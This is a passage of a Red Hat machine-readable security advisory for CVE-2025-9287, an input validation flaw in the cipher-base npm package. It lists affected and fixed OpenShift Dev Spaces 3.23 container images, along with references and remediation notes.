            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2389932"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid\u00a0value calculations,\u00a0hanging and\u00a0rewinding the\u00a0hash state, including\u00a0turning a tagged hash\u00a0into an untagged\u00a0hash, for malicious JSON-stringifyable\u00a0inputs.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cipher-base: Cipher-base hash manipulation",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "RHBZ#2389932",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/cipher-base/pull/23",
          "url": "https://github.com/browserify/cipher-base/pull/23"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
          "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
        }
      ],
      "release_date": "2025-08-20T21:43:56.548000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
